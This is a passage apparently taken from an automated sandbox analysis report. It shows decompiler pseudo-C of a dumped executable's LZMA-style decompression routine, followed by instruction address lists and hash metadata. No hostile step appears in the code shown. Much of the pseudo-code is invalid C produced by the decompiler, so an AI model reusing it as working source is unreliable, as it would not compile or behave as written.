                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t484 = __ebp - 0x70;
                                                												 *_t484 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t484;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												L148:
                                                												_t487 = __ebp - 0x48;
                                                												 *_t487 =  *(__ebp - 0x48) - 1;
                                                												__eflags =  *_t487;
                                                												L149:
                                                												__eflags =  *(__ebp - 0x48);
                                                												if( *(__ebp - 0x48) <= 0) {
                                                													__ecx =  *(__ebp - 0x40);
                                                													__ebx =  *(__ebp - 0x50);
                                                													0 = 1;
                                                													__eax = 1 << __cl;
                                                													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                													__eax =  *(__ebp - 0x7c);
                                                													 *(__ebp - 0x44) = __ebx;
                                                													while(1) {
                                                														 *(_t613 - 0x88) = _t533;
                                                														goto L1;
                                                													}
                                                												}
                                                												__eax =  *(__ebp - 0x50);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                												__eax =  *(__ebp - 0x58);
                                                												__esi = __edx + __eax;
                                                												 *(__ebp - 0x54) = __esi;
                                                												__ax =  *__esi;
                                                												__edi = __ax & 0x0000ffff;
                                                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                												__eflags =  *(__ebp - 0xc) - __ecx;
                                                												if( *(__ebp - 0xc) >= __ecx) {
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                													__cx = __ax;
                                                													__cx = __ax >> 5;
                                                													__eax = __eax - __ecx;
                                                													__edx = __edx + 1;
                                                													__eflags = __edx;
                                                													 *__esi = __ax;
                                                													 *(__ebp - 0x50) = __edx;
                                                												} else {
                                                													 *(__ebp - 0x10) = __ecx;
                                                													0x800 = 0x800 - __edi;
                                                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                													 *__esi = __cx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													goto L148;
                                                												} else {
                                                													goto L146;
                                                												}
                                                											case 0x19:
                                                												__eflags = __ebx - 4;
                                                												if(__ebx < 4) {
                                                													 *(__ebp - 0x2c) = __ebx;
                                                													L119:
                                                													_t393 = __ebp - 0x2c;
                                                													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                													__eflags =  *_t393;
                                                													L120:
                                                													__eax =  *(__ebp - 0x2c);
                                                													__eflags = __eax;
                                                													if(__eax == 0) {
                                                														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                														goto L170;
                                                													}
                                                													__eflags = __eax -  *(__ebp - 0x60);
                                                													if(__eax >  *(__ebp - 0x60)) {
                                                														goto L171;
                                                													}
                                                													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                													__eax =  *(__ebp - 0x30);
                                                													_t400 = __ebp - 0x60;
                                                													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                													__eflags =  *_t400;
                                                													goto L123;
                                                												}
                                                												__ecx = __ebx;
                                                												__eax = __ebx;
                                                												__ecx = __ebx >> 1;
                                                												__eax = __ebx & 0x00000001;
                                                												__ecx = (__ebx >> 1) - 1;
                                                												__al = __al | 0x00000002;
                                                												__eax = (__ebx & 0x00000001) << __cl;
                                                												__eflags = __ebx - 0xe;
                                                												 *(__ebp - 0x2c) = __eax;
                                                												if(__ebx >= 0xe) {
                                                													__ebx = 0;
                                                													 *(__ebp - 0x48) = __ecx;
                                                													L102:
                                                													__eflags =  *(__ebp - 0x48);
                                                													if( *(__ebp - 0x48) <= 0) {
                                                														__eax = __eax + __ebx;
                                                														 *(__ebp - 0x40) = 4;
                                                														 *(__ebp - 0x2c) = __eax;
                                                														__eax =  *(__ebp - 4);
                                                														__eax =  *(__ebp - 4) + 0x644;
                                                														__eflags = __eax;
                                                														L108:
                                                														__ebx = 0;
                                                														 *(__ebp - 0x58) = __eax;
                                                														 *(__ebp - 0x50) = 1;
                                                														 *(__ebp - 0x44) = 0;
                                                														 *(__ebp - 0x48) = 0;
                                                														L112:
                                                														__eax =  *(__ebp - 0x40);
                                                														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                															_t391 = __ebp - 0x2c;
                                                															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                															__eflags =  *_t391;
                                                															goto L119;
                                                														}
                                                														__eax =  *(__ebp - 0x50);
                                                														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                														__eax =  *(__ebp - 0x58);
                                                														__esi = __edi + __eax;
                                                														 *(__ebp - 0x54) = __esi;
                                                														__ax =  *__esi;
                                                														__ecx = __ax & 0x0000ffff;
                                                														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                														__eflags =  *(__ebp - 0xc) - __edx;
                                                														if( *(__ebp - 0xc) >= __edx) {
                                                															__ecx = 0;
                                                															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                															__ecx = 1;
                                                															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                															__ebx = 1;
                                                															__ecx =  *(__ebp - 0x48);
                                                															__ebx = 1 << __cl;
                                                															__ecx = 1 << __cl;
                                                															__ebx =  *(__ebp - 0x44);
                                                															__ebx =  *(__ebp - 0x44) | __ecx;
                                                															__cx = __ax;
                                                															__cx = __ax >> 5;
                                                															__eax = __eax - __ecx;
                                                															__edi = __edi + 1;
                                                															__eflags = __edi;
                                                															 *(__ebp - 0x44) = __ebx;
                                                															 *__esi = __ax;
                                                															 *(__ebp - 0x50) = __edi;
                                                														} else {
                                                															 *(__ebp - 0x10) = __edx;
                                                															0x800 = 0x800 - __ecx;
                                                															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                															 *__esi = __dx;
                                                														}
                                                														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                														if( *(__ebp - 0x10) >= 0x1000000) {
                                                															L111:
                                                															_t368 = __ebp - 0x48;
                                                															 *_t368 =  *(__ebp - 0x48) + 1;
                                                															__eflags =  *_t368;
                                                															goto L112;
                                                														} else {
                                                															goto L109;
                                                														}
                                                													}
                                                													__ecx =  *(__ebp - 0xc);
                                                													__ebx = __ebx + __ebx;
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                													 *(__ebp - 0x44) = __ebx;
                                                													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                														__ecx =  *(__ebp - 0x10);
                                                														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                														__ebx = __ebx | 0x00000001;
                                                														__eflags = __ebx;
                                                														 *(__ebp - 0x44) = __ebx;
                                                													}
                                                													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                													if( *(__ebp - 0x10) >= 0x1000000) {
                                                														L101:
                                                														_t338 = __ebp - 0x48;
                                                														 *_t338 =  *(__ebp - 0x48) - 1;
                                                														__eflags =  *_t338;
                                                														goto L102;
                                                													} else {
                                                														goto L99;
                                                													}
                                                												}
                                                												__edx =  *(__ebp - 4);
                                                												__eax = __eax - __ebx;
                                                												 *(__ebp - 0x40) = __ecx;
                                                												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                												goto L108;
                                                											case 0x1a:
                                                												L56:
                                                												__eflags =  *(__ebp - 0x64);
                                                												if( *(__ebp - 0x64) == 0) {
                                                													 *(__ebp - 0x88) = 0x1a;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x68);
                                                												__al =  *(__ebp - 0x5c);
                                                												__edx =  *(__ebp - 8);
                                                												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                												 *( *(__ebp - 0x68)) = __al;
                                                												__ecx =  *(__ebp - 0x14);
                                                												 *(__ecx +  *(__ebp - 8)) = __al;
                                                												__eax = __ecx + 1;
                                                												__edx = 0;
                                                												_t192 = __eax %  *(__ebp - 0x74);
                                                												__eax = __eax /  *(__ebp - 0x74);
                                                												__edx = _t192;
                                                												goto L80;
                                                											case 0x1b:
                                                												L76:
                                                												__eflags =  *(__ebp - 0x64);
                                                												if( *(__ebp - 0x64) == 0) {
                                                													 *(__ebp - 0x88) = 0x1b;
                                                													goto L170;
                                                												}
                                                												__eax =  *(__ebp - 0x14);
                                                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                												__eflags = __eax -  *(__ebp - 0x74);
                                                												if(__eax >=  *(__ebp - 0x74)) {
                                                													__eax = __eax +  *(__ebp - 0x74);
                                                													__eflags = __eax;
                                                												}
                                                												__edx =  *(__ebp - 8);
                                                												__cl =  *(__eax + __edx);
                                                												__eax =  *(__ebp - 0x14);
                                                												 *(__ebp - 0x5c) = __cl;
                                                												 *(__eax + __edx) = __cl;
                                                												__eax = __eax + 1;
                                                												__edx = 0;
                                                												_t275 = __eax %  *(__ebp - 0x74);
                                                												__eax = __eax /  *(__ebp - 0x74);
                                                												__edx = _t275;
                                                												__eax =  *(__ebp - 0x68);
                                                												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                												_t284 = __ebp - 0x64;
                                                												 *_t284 =  *(__ebp - 0x64) - 1;
                                                												__eflags =  *_t284;
                                                												 *( *(__ebp - 0x68)) = __cl;
                                                												L80:
                                                												 *(__ebp - 0x14) = __edx;
                                                												goto L81;
                                                											case 0x1c:
                                                												while(1) {
                                                													L123:
                                                													__eflags =  *(__ebp - 0x64);
                                                													if( *(__ebp - 0x64) == 0) {
                                                														break;
                                                													}
                                                													__eax =  *(__ebp - 0x14);
                                                													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                													__eflags = __eax -  *(__ebp - 0x74);
                                                													if(__eax >=  *(__ebp - 0x74)) {
                                                														__eax = __eax +  *(__ebp - 0x74);
                                                														__eflags = __eax;
                                                													}
                                                													__edx =  *(__ebp - 8);
                                                													__cl =  *(__eax + __edx);
                                                													__eax =  *(__ebp - 0x14);
                                                													 *(__ebp - 0x5c) = __cl;
                                                													 *(__eax + __edx) = __cl;
                                                													__eax = __eax + 1;
                                                													__edx = 0;
                                                													_t414 = __eax %  *(__ebp - 0x74);
                                                													__eax = __eax /  *(__ebp - 0x74);
                                                													__edx = _t414;
                                                													__eax =  *(__ebp - 0x68);
                                                													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                													__eflags =  *(__ebp - 0x30);
                                                													 *( *(__ebp - 0x68)) = __cl;
                                                													 *(__ebp - 0x14) = _t414;
                                                													if( *(__ebp - 0x30) > 0) {
                                                														continue;
                                                													} else {
                                                														L81:
                                                														 *(__ebp - 0x88) = 2;
                                                														goto L1;
                                                													}
                                                												}
                                                												 *(__ebp - 0x88) = 0x1c;
                                                												goto L170;
                                                										}
                                                									}
                                                									L171:
                                                									_t535 = _t534 | 0xffffffff;
                                                									goto L172;
                                                								}
                                                							}
                                                						}
                                                					}
                                                					goto L1;
                                                				}
                                                			}













                                                0x004069f6
                                                0x004063f4
                                                0x004063f7
                                                0x004063fa
                                                0x004063fe
                                                0x00406401
                                                0x00406407
                                                0x00406409
                                                0x00406409
                                                0x00406409
                                                0x0040640c
                                                0x0040640f
                                                0x0040640f
                                                0x00406415
                                                0x004063b3
                                                0x004063b3
                                                0x004063b6
                                                0x00000000
                                                0x004063b6
                                                0x00406417
                                                0x00406417
                                                0x0040641a
                                                0x0040641d
                                                0x00406420
                                                0x00406423
                                                0x00406426
                                                0x00406429
                                                0x0040642c
                                                0x0040642f
                                                0x00406432
                                                0x00406435
                                                0x0040644d
                                                0x00406450
                                                0x00406453
                                                0x00406456
                                                0x00406456
                                                0x00406459
                                                0x0040645d
                                                0x0040645f
                                                0x00406437
                                                0x00406437
                                                0x0040643f
                                                0x00406444
                                                0x00406446
                                                0x00406448
                                                0x00406448
                                                0x00406462
                                                0x00406469
                                                0x0040646c
                                                0x00000000
                                                0x0040646e
                                                0x00000000
                                                0x0040646e
                                                0x00000000
                                                0x004066fb
                                                0x004066fb
                                                0x004066ff
                                                0x00406a26
                                                0x00000000
                                                0x00406a26
                                                0x00406705
                                                0x00406708
                                                0x0040670b
                                                0x0040670f
                                                0x00406712
                                                0x00406718
                                                0x0040671a
                                                0x0040671a
                                                0x0040671a
                                                0x0040671d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040680a
                                                0x0040680e
                                                0x00406830
                                                0x00406833
                                                0x0040683d
                                                0x00406840
                                                0x00406840
                                                0x00406840
                                                0x00000000
                                                0x00406840
                                                0x00406840
                                                0x00406810
                                                0x00406813
                                                0x00406817
                                                0x0040681a
                                                0x0040681a
                                                0x0040681d
                                                0x00000000
                                                0x00000000
                                                0x004068c7
                                                0x004068cb
                                                0x004068e9
                                                0x004068e9
                                                0x004068e9
                                                0x004068f0
                                                0x004068f7
                                                0x004068fe
                                                0x004068fe
                                                0x00000000
                                                0x004068fe
                                                0x004068cd
                                                0x004068d0
                                                0x004068d3
                                                0x004068d6
                                                0x004068dd
                                                0x00406821
                                                0x00406821
                                                0x00406824
                                                0x00000000
                                                0x00000000
                                                0x004069b8
                                                0x004069bb
                                                0x004068bc
                                                0x00000000
                                                0x00000000
                                                0x004065f2
                                                0x004065f4
                                                0x004065fb
                                                0x004065fc
                                                0x004065fe
                                                0x00406601
                                                0x00000000
                                                0x00000000
                                                0x00406609
                                                0x0040660c
                                                0x0040660f
                                                0x00406611
                                                0x00406613
                                                0x00406613
                                                0x00406614
                                                0x00406617
                                                0x0040661e
                                                0x00406621
                                                0x0040662f
                                                0x00000000
                                                0x00000000
                                                0x00406905
                                                0x00406905
                                                0x00406908
                                                0x0040690f
                                                0x00000000
                                                0x00000000
                                                0x00406914
                                                0x00406914
                                                0x00406918
                                                0x00406a50
                                                0x00000000
                                                0x00406a50
                                                0x0040691e
                                                0x00406921
                                                0x00406924
                                                0x00406928
                                                0x0040692b
                                                0x00406931
                                                0x00406933
                                                0x00406933
                                                0x00406933
                                                0x00406936
                                                0x00406939
                                                0x00406939
                                                0x00406939
                                                0x00406939
                                                0x0040693c
                                                0x0040693c
                                                0x00406940
                                                0x004069a0
                                                0x004069a3
                                                0x004069a8
                                                0x004069a9
                                                0x004069ab
                                                0x004069ad
                                                0x004069b0
                                                0x004068bc
                                                0x004068bc
                                                0x00000000
                                                0x004068c2
                                                0x004068bc
                                                0x00406942
                                                0x00406948
                                                0x0040694b
                                                0x0040694e
                                                0x00406951
                                                0x00406954
                                                0x00406957
                                                0x0040695a
                                                0x0040695d
                                                0x00406960
                                                0x00406963
                                                0x0040697c
                                                0x0040697f
                                                0x00406982
                                                0x00406985
                                                0x00406989
                                                0x0040698b
                                                0x0040698b
                                                0x0040698c
                                                0x0040698f
                                                0x00406965
                                                0x00406965
                                                0x0040696d
                                                0x00406972
                                                0x00406974
                                                0x00406977
                                                0x00406977
                                                0x00406992
                                                0x00406999
                                                0x00000000
                                                0x0040699b
                                                0x00000000
                                                0x0040699b
                                                0x00000000
                                                0x00406637
                                                0x0040663a
                                                0x00406670
                                                0x004067a0
                                                0x004067a0
                                                0x004067a0
                                                0x004067a0
                                                0x004067a3
                                                0x004067a3
                                                0x004067a6
                                                0x004067a8
                                                0x00406a32
                                                0x00000000
                                                0x00406a32
                                                0x004067ae
                                                0x004067b1
                                                0x00000000
                                                0x00000000
                                                0x004067b7
                                                0x004067bb
                                                0x004067be
                                                0x004067be
                                                0x004067be
                                                0x00000000
                                                0x004067be
                                                0x0040663c
                                                0x0040663e
                                                0x00406640
                                                0x00406642
                                                0x00406645
                                                0x00406646
                                                0x00406648
                                                0x0040664a
                                                0x0040664d
                                                0x00406650
                                                0x00406666
                                                0x0040666b
                                                0x004066a3
                                                0x004066a3
                                                0x004066a7
                                                0x004066d3
                                                0x004066d5
                                                0x004066dc
                                                0x004066df
                                                0x004066e2
                                                0x004066e2
                                                0x004066e7
                                                0x004066e7
                                                0x004066e9
                                                0x004066ec
                                                0x004066f3
                                                0x004066f6
                                                0x00406723
                                                0x00406723
                                                0x00406726
                                                0x00406729
                                                0x0040679d
                                                0x0040679d
                                                0x0040679d
                                                0x00000000
                                                0x0040679d
                                                0x0040672b
                                                0x00406731
                                                0x00406734
                                                0x00406737
                                                0x0040673a
                                                0x0040673d
                                                0x00406740
                                                0x00406743
                                                0x00406746
                                                0x00406749
                                                0x0040674c
                                                0x00406765
                                                0x00406767
                                                0x0040676a
                                                0x0040676b
                                                0x0040676e
                                                0x00406770
                                                0x00406773
                                                0x00406775
                                                0x00406777
                                                0x0040677a
                                                0x0040677c
                                                0x0040677f
                                                0x00406783
                                                0x00406785
                                                0x00406785
                                                0x00406786
                                                0x00406789
                                                0x0040678c
                                                0x0040674e
                                                0x0040674e
                                                0x00406756
                                                0x0040675b
                                                0x0040675d
                                                0x00406760
                                                0x00406760
                                                0x0040678f
                                                0x00406796
                                                0x00406720
                                                0x00406720
                                                0x00406720
                                                0x00406720
                                                0x00000000
                                                0x00406798
                                                0x00000000
                                                0x00406798
                                                0x00406796
                                                0x004066a9
                                                0x004066ac
                                                0x004066ae
                                                0x004066b1
                                                0x004066b4
                                                0x004066b7
                                                0x004066b9
                                                0x004066bc
                                                0x004066bf
                                                0x004066bf
                                                0x004066c2
                                                0x004066c2
                                                0x004066c5
                                                0x004066cc
                                                0x004066a0
                                                0x004066a0
                                                0x004066a0
                                                0x004066a0
                                                0x00000000
                                                0x004066ce
                                                0x00000000
                                                0x004066ce
                                                0x004066cc
                                                0x00406652
                                                0x00406655
                                                0x00406657
                                                0x0040665a
                                                0x00000000
                                                0x00000000
                                                0x004063b9
                                                0x004063b9
                                                0x004063bd
                                                0x00406a02
                                                0x00000000
                                                0x00406a02
                                                0x004063c3
                                                0x004063c6
                                                0x004063c9
                                                0x004063cc
                                                0x004063cf
                                                0x004063d2
                                                0x004063d5
                                                0x004063d7
                                                0x004063da
                                                0x004063dd
                                                0x004063e0
                                                0x004063e2
                                                0x004063e2
                                                0x004063e2
                                                0x00000000
                                                0x00000000
                                                0x00406544
                                                0x00406544
                                                0x00406548
                                                0x00406a0e
                                                0x00000000
                                                0x00406a0e
                                                0x0040654e
                                                0x00406551
                                                0x00406554
                                                0x00406557
                                                0x00406559
                                                0x00406559
                                                0x00406559
                                                0x0040655c
                                                0x0040655f
                                                0x00406562
                                                0x00406565
                                                0x00406568
                                                0x0040656b
                                                0x0040656c
                                                0x0040656e
                                                0x0040656e
                                                0x0040656e
                                                0x00406571
                                                0x00406574
                                                0x00406577
                                                0x0040657a
                                                0x0040657a
                                                0x0040657a
                                                0x0040657d
                                                0x0040657f
                                                0x0040657f
                                                0x00000000
                                                0x00000000
                                                0x004067c1
                                                0x004067c1
                                                0x004067c1
                                                0x004067c5
                                                0x00000000
                                                0x00000000
                                                0x004067cb
                                                0x004067ce
                                                0x004067d1
                                                0x004067d4
                                                0x004067d6
                                                0x004067d6
                                                0x004067d6
                                                0x004067d9
                                                0x004067dc
                                                0x004067df
                                                0x004067e2
                                                0x004067e5
                                                0x004067e8
                                                0x004067e9
                                                0x004067eb
                                                0x004067eb
                                                0x004067eb
                                                0x004067ee
                                                0x004067f1
                                                0x004067f4
                                                0x004067f7
                                                0x004067fa
                                                0x004067fe
                                                0x00406800
                                                0x00406803
                                                0x00000000
                                                0x00406805
                                                0x00406582
                                                0x00406582
                                                0x00000000
                                                0x00406582
                                                0x00406803
                                                0x00406a38
                                                0x00000000
                                                0x00000000
                                                0x00406067
                                                0x00406a6f
                                                0x00406a6f
                                                0x00000000
                                                0x00406a6f
                                                0x004068bc
                                                0x00406843
                                                0x00406840
                                                0x00000000
                                                0x00406595

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                                                • Instruction ID: c4674237f5282a099a09cde02a4657600336f9fef0cdfe8d994bfdecfa790225
                                                • Opcode Fuzzy Hash: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                                                • Instruction Fuzzy Hash: 4A714671E00228CFDF28DFA8C8547ADBBB1FB44301F15816AD916BB281C7785A96DF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 98%
                                                			E004064DD() {
                                                				unsigned short _t531;
                                                				signed int _t532;
                                                				void _t533;
                                                				signed int _t534;
                                                				signed int _t535;
                                                				signed int _t565;
                                                				signed int _t568;
                                                				signed int _t589;
                                                				signed int* _t606;
                                                				void* _t613;
                                                
                                                				L0:
                                                				while(1) {
                                                					L0:
                                                					if( *(_t613 - 0x40) != 0) {
                                                						 *(_t613 - 0x84) = 0xa;
                                                						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                                					} else {
                                                						 *(__ebp - 0x84) = 9;
                                                						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                					}
                                                					while(1) {
                                                						 *(_t613 - 0x54) = _t606;
                                                						while(1) {
                                                							L133:
                                                							_t531 =  *_t606;
                                                							_t589 = _t531 & 0x0000ffff;
                                                							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                							if( *(_t613 - 0xc) >= _t565) {
                                                								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                								 *(_t613 - 0x40) = 1;
                                                								_t532 = _t531 - (_t531 >> 5);
                                                								 *_t606 = _t532;
                                                							} else {
                                                								 *(_t613 - 0x10) = _t565;
                                                								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                							}
                                                							if( *(_t613 - 0x10) >= 0x1000000) {
                                                								goto L139;
                                                							}
                                                							L137:
                                                							if( *(_t613 - 0x6c) == 0) {
                                                								 *(_t613 - 0x88) = 5;
                                                								L170:
                                                								_t568 = 0x22;
                                                								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                								_t535 = 0;
                                                								L172:
                                                								return _t535;
                                                							}
                                                							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                							L139:
                                                							_t533 =  *(_t613 - 0x84);
                                                							while(1) {
                                                								 *(_t613 - 0x88) = _t533;
                                                								while(1) {
                                                									L1:
                                                									_t534 =  *(_t613 - 0x88);
                                                									if(_t534 > 0x1c) {
                                                										break;
                                                									}
                                                									switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
                                                										case 0:
                                                											if( *(_t613 - 0x6c) == 0) {
                                                												goto L170;
                                                											}
                                                											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                											_t534 =  *( *(_t613 - 0x70));
                                                											if(_t534 > 0xe1) {
                                                												goto L171;
                                                											}
                                                											_t538 = _t534 & 0x000000ff;
                                                											_push(0x2d);
                                                											asm("cdq");
                                                											_pop(_t570);
                                                											_push(9);
                                                											_pop(_t571);
                                                											_t609 = _t538 / _t570;
                                                											_t540 = _t538 % _t570 & 0x000000ff;
                                                											asm("cdq");
                                                											_t604 = _t540 % _t571 & 0x000000ff;
                                                											 *(_t613 - 0x3c) = _t604;
                                                											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                												L10:
                                                												if(_t612 == 0) {
                                                													L12:
                                                													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                													goto L15;
                                                												} else {
                                                													goto L11;
                                                												}
                                                												do {
                                                													L11:
                                                													_t612 = _t612 - 1;
                                                													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                												} while (_t612 != 0);
                                                												goto L12;
                                                											}
                                                											if( *(_t613 - 4) != 0) {
                                                												GlobalFree( *(_t613 - 4));
                                                											}
                                                											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                											 *(_t613 - 4) = _t534;
                                                											if(_t534 == 0) {
                                                												goto L171;
                                                											} else {
                                                												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                												goto L10;
                                                											}
                                                										case 1:
                                                											L13:
                                                											__eflags =  *(_t613 - 0x6c);
                                                											if( *(_t613 - 0x6c) == 0) {
                                                												 *(_t613 - 0x88) = 1;
                                                												goto L170;
                                                											}
                                                											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                											_t45 = _t613 - 0x48;
                                                											 *_t45 =  *(_t613 - 0x48) + 1;
                                                											__eflags =  *_t45;
                                                											L15:
                                                											if( *(_t613 - 0x48) < 4) {
                                                												goto L13;
                                                											}
                                                											_t546 =  *(_t613 - 0x40);
                                                											if(_t546 ==  *(_t613 - 0x74)) {
                                                												L20:
                                                												 *(_t613 - 0x48) = 5;
                                                												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                												goto L23;
                                                											}
                                                											 *(_t613 - 0x74) = _t546;
                                                											if( *(_t613 - 8) != 0) {
                                                												GlobalFree( *(_t613 - 8)); // executed
                                                											}
                                                											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                											 *(_t613 - 8) = _t534;
                                                											if(_t534 == 0) {
                                                												goto L171;
                                                											} else {
                                                												goto L20;
                                                											}
                                                										case 2:
                                                											L24:
                                                											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                											 *(_t613 - 0x84) = 6;
                                                											 *(_t613 - 0x4c) = _t553;
                                                											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                											 *(_t613 - 0x54) = _t606;
                                                											goto L133;
                                                										case 3:
                                                											L21:
                                                											__eflags =  *(_t613 - 0x6c);
                                                											if( *(_t613 - 0x6c) == 0) {
                                                												 *(_t613 - 0x88) = 3;
                                                												goto L170;
                                                											}
                                                											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                											_t67 = _t613 - 0x70;
                                                											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                											__eflags =  *_t67;
                                                											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                											L23:
                                                											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                											if( *(_t613 - 0x48) != 0) {
                                                												goto L21;
                                                											}
                                                											goto L24;
                                                										case 4:
                                                											L133:
                                                											_t531 =  *_t606;
                                                											_t589 = _t531 & 0x0000ffff;
                                                											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                											if( *(_t613 - 0xc) >= _t565) {
                                                												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                												 *(_t613 - 0x40) = 1;
                                                												_t532 = _t531 - (_t531 >> 5);
                                                												 *_t606 = _t532;
                                                											} else {
                                                												 *(_t613 - 0x10) = _t565;
                                                												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
